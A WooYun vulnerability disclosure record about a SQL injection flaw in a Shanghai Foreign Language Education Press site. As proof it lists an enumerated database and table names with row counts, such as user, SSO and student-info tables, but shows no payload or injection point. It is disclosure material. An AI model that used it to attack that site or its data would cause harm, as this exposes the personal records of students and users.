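Vulnerability summary
Bug ID: wooyun-2015-0155335
Title: SQL injection vulnerability in a site of Shanghai Foreign Language Education Press
Vendor: sflep.com
Author: 路人甲
Submitted: 2015-11-23 19:22
Fixed: 2015-11-28 19:24
Disclosed: 2015-11-28 19:24
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 15
Status: The vendor was notified of the vulnerability but ignored it
Source: http://www.wooyun.org; for questions or help, contact [email protected]
Tags: none
Vulnerability details
Disclosure status:
2015-11-23: Details reported to the vendor; awaiting vendor action
2015-11-28: The vendor actively ignored the vulnerability; details disclosed to the public
Brief description:
Detailed description:
Proof of vulnerability: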
Database: SWPX
[126 tables]
| WHATYUSER_LOG4J | 40485 |
| SSO_USER | 8618 |
| ENTITY_STUDENT_INFO | 8591 |
| WHATYFORUM_USERINFO | 8472 |
| ENTITY_REGISTER_INFO | 8407 |
| WHATYFORUM_USERDETAIL | 8300 |
| WHATYFORUM_USERONLINE | 8059 |
| WHATYFORUM_SYSNUMSTAT | 2430 |
| INFO_NEWS | 276 |
| ENTITY_RESOURCE_SEMESTER | 225 |
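Fix:
Copyright notice: Please credit the source when reposting: 路人甲@乌云
Vulnerability response
Vendor response:
Severity: No impact; ignored by the vendor
Ignored at: 2015-11-28 19:24
Vendor reply:
Vulnerability Rank: 4 (WooYun rating)
Latest status:
None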